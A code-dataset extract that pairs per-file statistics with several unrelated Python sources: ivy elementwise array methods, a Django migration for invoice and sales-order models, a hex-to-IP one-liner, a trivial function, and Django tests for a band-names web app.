| 0.690643
| 2,253
| 18,296
| 5.365291
| 0.117621
| 0.247518
| 0.034249
| 0.052945
| 0.80766
| 0.795334
| 0.772253
| 0.752813
| 0.70814
| 0.69722
| 0
| 0.008565
| 0.215129
| 18,296
| 570
| 94
| 32.098246
| 0.833217
| 0.152711
| 0
| 0.709859
| 0
| 0
| 0.13738
| 0.048358
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.03662
| false
| 0.002817
| 0.129577
| 0
| 0.166197
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f0be90d90114a72ba23e639875f66e9c2ca4e8c
| 9,251
|
py
|
Python
|
ivy/array/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy/array/elementwise.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy/array/elementwise.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import abc
from typing import Optional, Union
# local
import ivy
# ToDo: implement all methods here as public instance methods
# noinspection PyUnresolvedReferences
class ArrayWithElementwise(abc.ABC):
def abs(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.abs(self._data, out=out)
def acosh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.acosh(self._data, out=out)
def acos(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.acos(self._data, out=out)
def add(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
*,
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.add(self._data, x2, out=out)
def asin(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.asin(self._data, out=out)
def asinh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.asinh(self._data, out=out)
def atan(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.atan(self._data, out=out)
def atan2(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.atan2(self._data, x2, out=out)
def atanh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.atanh(self._data, out=out)
def bitwise_and(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_and(self._data, x2, out=out)
def bitwise_left_shift(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_left_shift(self._data, x2, out=out)
def bitwise_invert(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.bitwise_invert(self._data, out=out)
def bitwise_or(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_or(self._data, x2, out=out)
def bitwise_right_shift(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_right_shift(self._data, x2, out=out)
def bitwise_xor(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_xor(self._data, x2, out=out)
def ceil(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.ceil(self._data, out=out)
def cos(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.cos(self._data, out=out)
def cosh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.cosh(self._data, out=out)
def divide(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.divide(self._data, x2, out=out)
def equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.equal(self._data, x2, out=out)
def exp(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.exp(self._data, out=out)
def expm1(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.expm1(self._data, out=out)
def floor(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.floor(self._data, out=out)
def floor_divide(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.floor_divide(self._data, x2, out=out)
def greater(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.greater(self._data, x2, out=out)
def greater_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.greater_equal(self._data, x2, out=out)
def isfinite(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isfinite(self._data, out=out)
def isinf(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isinf(self._data, out=out)
def isnan(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isnan(self._data, out=out)
def less(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.less(self._data, x2, out=out)
def less_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.less_equal(self._data, x2, out=out)
def log(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log(self._data, out=out)
def log1p(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log1p(self._data, out=out)
def log2(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log2(self._data, out=out)
def log10(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log10(self._data, out=out)
def logaddexp(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logaddexp(self._data, x2, out=out)
def logical_and(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_and(self._data, x2, out=out)
def logical_not(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.logical_not(self._data, out=out)
def logical_or(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_or(self._data, x2, out=out)
def logical_xor(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_xor(self._data, x2, out=out)
def multiply(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.multiply(self._data, x2, out=out)
def negative(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.negative(self._data, out=out)
def not_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.not_equal(self._data, x2, out=out)
def positive(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.positive(self._data, out=out)
def pow(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.pow(self._data, x2, out=out)
def remainder(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.remainder(self._data, x2, out=out)
def round(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.round(self._data, out=out)
def sign(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sign(self._data, out=out)
def sin(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sin(self._data, out=out)
def sinh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sinh(self._data, out=out)
def square(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.square(self._data, out=out)
def sqrt(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sqrt(self._data, out=out)
def subtract(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.subtract(self._data, x2, out=out)
def tan(self: ivy.Array, *, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.tan(self._data, out=out)
def tanh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.tanh(self._data, out=out)
def trunc(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.trunc(self._data, out=out)
def erf(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.erf(self._data, out=out)
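# A hypothetical usage sketch (illustrative rather than runnable as-is, since
# the backend-selection call name varies across ivy versions): every method
# above forwards to the functional ivy API on the wrapped self._data, so the
# instance-method and functional call styles agree.
#
#   ivy.set_backend("numpy")            # name assumed for this ivy version
#   x = ivy.array([1.0, 4.0, 9.0])
#   assert ivy.all(x.sqrt() == ivy.sqrt(x))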
| 33.518116
| 86
| 0.60988
| 1,302
| 9,251
| 4.264977
| 0.063748
| 0.279489
| 0.123177
| 0.19503
| 0.888529
| 0.799748
| 0.759229
| 0.693859
| 0.682694
| 0.682694
| 0
| 0.008282
| 0.243001
| 9,251
| 275
| 87
| 33.64
| 0.784664
| 0.011674
| 0
| 0.436019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003636
| 0
| 1
| 0.270142
| false
| 0
| 0.014218
| 0.270142
| 0.559242
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
0f550141b52201cabd98458795c733b5538fd14d
| 3,970
|
py
|
Python
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 1
|
2021-05-28T05:22:54.000Z
|
2021-05-28T05:22:54.000Z
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 3
|
2021-05-31T15:44:14.000Z
|
2021-06-29T07:48:13.000Z
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 1
|
2021-05-30T07:42:54.000Z
|
2021-05-30T07:42:54.000Z
|
# Generated by Django 3.2.3 on 2021-05-28 07:02
from decimal import Decimal
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20210528_0647'),
]
operations = [
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('description', models.TextField(blank=True)),
('payment_date', models.DateField()),
('payment_method', models.CharField(blank=True, max_length=255)),
('payment_note', models.TextField(blank=True)),
('gst_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('gst_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('net', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('total_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('grand_total', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.company')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.customer')),
('salesperson', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SalesOrder',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('description', models.TextField(blank=True)),
('payment_date', models.DateField()),
('payment_method', models.CharField(blank=True, max_length=255)),
('payment_note', models.TextField(blank=True)),
('gst_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('gst_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('net', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('total_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('grand_total', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.company')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.customer')),
('invoice', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.invoice')),
('salesperson', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
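# A hypothetical sketch of the model source that `makemigrations` would turn
# into the CreateModel operations above (module layout assumed, fields abridged):
#
#   from decimal import Decimal
#   from django.db import models
#
#   class Invoice(models.Model):
#       date = models.DateField()
#       gst_rate = models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)
#       customer = models.ForeignKey('core.Customer', null=True, on_delete=models.SET_NULL)
#       # ... remaining fields mirror the field list above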
| 60.151515
| 149
| 0.61864
| 437
| 3,970
| 5.453089
| 0.189931
| 0.105749
| 0.146874
| 0.182123
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0
| 0.030402
| 0.229471
| 3,970
| 65
| 150
| 61.076923
| 0.748611
| 0.011335
| 0
| 0.745763
| 1
| 0
| 0.115473
| 0.005863
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.067797
| 0
| 0.118644
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7e48bcdc2792b73955fd755c598e21eebc7c8baf
| 155
|
py
|
Python
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 14
|
2015-01-14T15:53:22.000Z
|
2019-06-21T06:15:47.000Z
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 1
|
2018-04-01T08:40:17.000Z
|
2020-06-24T10:05:33.000Z
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 12
|
2015-05-13T10:52:04.000Z
|
2020-10-07T14:49:37.000Z
|
#!/usr/bin/env python
import sys
ha = sys.argv[1]
print(".".join(str(int(ha[i:i + 2], 16)) for i in range(0, 8, 2)))
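# Worked example (hypothetical input): `python hex2ip.py c0a80001` prints
# 192.168.0.1, since 0xc0 = 192, 0xa8 = 168, 0x00 = 0, 0x01 = 1.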
| 19.375
| 101
| 0.56129
| 35
| 155
| 2.485714
| 0.514286
| 0.275862
| 0.367816
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118881
| 0.077419
| 155
| 7
| 102
| 22.142857
| 0.48951
| 0.129032
| 0
| 0
| 0
| 0
| 0.022388
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7e795c79ca209c2d16344444538c2d2656ad664d
| 71
|
py
|
Python
|
ipython/useful_functions.py
|
chenwang/QuantEcon.lectures.code
|
8832a74acd219a71cb0a99dc63c5e976598ac999
|
[
"BSD-3-Clause"
] | 56
|
2017-05-09T10:45:23.000Z
|
2022-01-20T20:33:27.000Z
|
ipython/useful_functions.py
|
chenwang/QuantEcon.lectures.code
|
8832a74acd219a71cb0a99dc63c5e976598ac999
|
[
"BSD-3-Clause"
] | 7
|
2017-06-30T01:52:46.000Z
|
2019-05-01T20:09:47.000Z
|
ipython/useful_functions.py
|
QuantEcon/QuantEcon.lectures.code
|
d61ac7bc54529dd5c77470c17539eb2418b047c9
|
[
"BSD-3-Clause"
] | 117
|
2017-04-25T16:09:17.000Z
|
2022-03-23T02:30:29.000Z
|
def meaning_of_life():
"Computes the meaning of life"
return 42
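# Example (interactive):
#   >>> meaning_of_life()
#   42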
| 23.666667
| 34
| 0.704225
| 11
| 71
| 4.363636
| 0.727273
| 0.375
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036364
| 0.225352
| 71
| 3
| 35
| 23.666667
| 0.836364
| 0.394366
| 0
| 0
| 0
| 0
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7ea95212b1dbeb19ed7cd27df4fd07c8f8bc774c
| 13,473
|
py
|
Python
|
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
import urllib2
# from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test import Client
from django.test import TestCase
from bandnames.names.models import Bands, NewBand, ReportBand
class BandNamesBasePagesTest(TestCase):
def test_home(self):
response = self.client.get(reverse('band_list'))
self.assertTrue(response.status_code == 200)
def test_about(self):
response = self.client.get(reverse('about'))
self.assertTrue(response.status_code == 200)
class BandNamesTest(TestCase):
def setUp(self):
self.band1 = Bands.objects.create(
name='Some Band Name',
reason='First band reason',
source='test',
scrapped_from='test',
)
self.band2 = Bands.objects.create(
name='Another Band Name',
reason='Second band reason',
source='test',
scrapped_from='test',
)
self.client = Client()
def test_band_list(self):
response = self.client.get(reverse('band_list'))
self.assertTrue(response.status_code == 200)
for band in response.context['bands']:
self.assertIn(band, [self.band1, self.band2])
self.assertTrue(response.content.count(self.band1.name) == 1)
self.assertTrue(response.content.count(self.band2.name) == 1)
def test_band_list_search(self):
search_url = '{0}?search={1}'.format(reverse('band_list'), self.band1.name) # NOQA
response = self.client.get(search_url)
self.assertTrue(response.status_code == 200)
self.assertTrue(len(response.context['bands']) == 1)
self.assertTrue(response.context['bands'][0] == self.band1)
        # The name appears twice in the rendered page: once in the search box
        # and once in the 'results for' heading
self.assertTrue(response.content.count(self.band1.name) == 2)
def test_band_details(self):
response = self.client.get(
reverse('band_info', args=(self.band1.name,))
)
self.assertTrue(response.status_code == 200)
self.assertTrue(self.band1 == response.context['band'])
self.assertTrue(response.content.count(self.band1.reason) == 1)
class BandNamesReportTest(TestCase):
def setUp(self):
self.band1 = Bands.objects.create(
name='Some Band Name',
reason='First band reason',
source='test',
scrapped_from='test',
)
self.band2 = Bands.objects.create(
name='Another Band Name',
reason='Second band reason',
source='test',
scrapped_from='test',
)
self.client = Client()
def test_band_report_page(self):
report_url = reverse('band_report', args=(self.band1.name,))
response = self.client.get(report_url)
self.assertTrue(response.status_code == 200)
self.assertTrue(self.band1 == response.context['band'])
def test_band_report(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.reporter_email == email)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
self.assertTrue(report.reporter_name == name)
report.delete()
def test_band_report_no_email(self):
report_url = reverse('band_report', args=(self.band1.name,))
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
self.assertTrue(report.reporter_name == name)
report.delete()
def test_band_report_no_reporter_name(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
reason = 'This is a reason'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.reporter_email == email)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
report.delete()
def test_band_report_bad_email(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test'
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
        report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reporter_email', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
def test_band_report_no_reason(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reason', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
def test_band_report_no_source(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('source', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
class NewBandTest(TestCase):
def test_new_band_page(self):
report_url = reverse('new_band')
response = self.client.get(report_url)
self.assertTrue(response.status_code == 200)
def test_new_band(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_name == submitter_name)
self.assertTrue(band.submitter_email == submitter_email)
band.delete()
def test_new_band_no_email(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_name == submitter_name)
band.delete()
    def test_new_band_no_submitter_name(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_email == submitter_email)
band.delete()
def test_new_band_bad_email(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('submitter_email', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
def test_new_band_no_reason(self):
report_url = reverse('new_band')
name = 'Test'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reason', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
def test_new_band_no_source(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('source', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
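# A hypothetical condensed helper (not part of the original suite) capturing
# the contract every POST test above asserts: a valid submission redirects
# (302) and persists a row, an invalid one re-renders the form (200):
def _assert_form_post(client, url, data, expect_valid):
    response = client.post(url, data=data)
    assert response.status_code == (302 if expect_valid else 200)
    return response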
# class BandNamesManagementCommandsTest(TestCase):
# def test_get_band_names(self):
# call_command('get_band_names', test=True)
# url = 'http://en.wikipedia.org/wiki/List_of_band_name_etymologies'
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://en.wikipedia.org/wiki/List_of_bands_named_after_other_bands%27_songs' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://rateyourmusic.com/list/DanFalco/why_are_they_called_duran_duran__a_guide_to_band_name_etymologies/1/' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://www.rateyourmusic.com/list/EverythingEvil/bands_named_after_movies_/' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
| 38.384615
| 133
| 0.608699
| 1,500
| 13,473
| 5.301333
| 0.082
| 0.105634
| 0.066398
| 0.066901
| 0.870599
| 0.868587
| 0.844567
| 0.831112
| 0.793888
| 0.787349
| 0
| 0.010881
| 0.263267
| 13,473
| 350
| 134
| 38.494286
| 0.790248
| 0.071699
| 0
| 0.79538
| 0
| 0
| 0.117704
| 0
| 0
| 0
| 0
| 0
| 0.227723
| 1
| 0.069307
| false
| 0
| 0.016502
| 0
| 0.09901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb10e58fbaea5667fc1c4e287db11f112aa0307
| 1,552
|
py
|
Python
|
